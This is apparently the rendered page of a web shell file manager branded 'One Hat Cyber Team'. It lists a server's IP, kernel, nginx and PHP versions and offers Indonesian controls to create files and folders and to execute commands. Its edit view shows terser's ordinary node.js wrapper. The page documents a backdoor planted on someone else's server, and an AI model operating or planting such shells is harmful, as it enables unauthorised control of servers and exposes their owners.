⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
invoice
/
node_modules
/
terser
/
tools
/
Edit File: node.js
var fs = require("fs"); var bundle_path = __dirname + "/../dist/bundle.js"; var UglifyJS = require(bundle_path); module.exports = UglifyJS; function infer_options(options) { var result = UglifyJS.minify("", options); return result.error && result.error.defs; } UglifyJS.default_options = function() { var defs = {}; Object.keys(infer_options({ 0: 0 })).forEach(function(component) { var options = {}; options[component] = { 0: 0 }; if (options = infer_options(options)) { defs[component] = options; } }); return defs; };
Simpan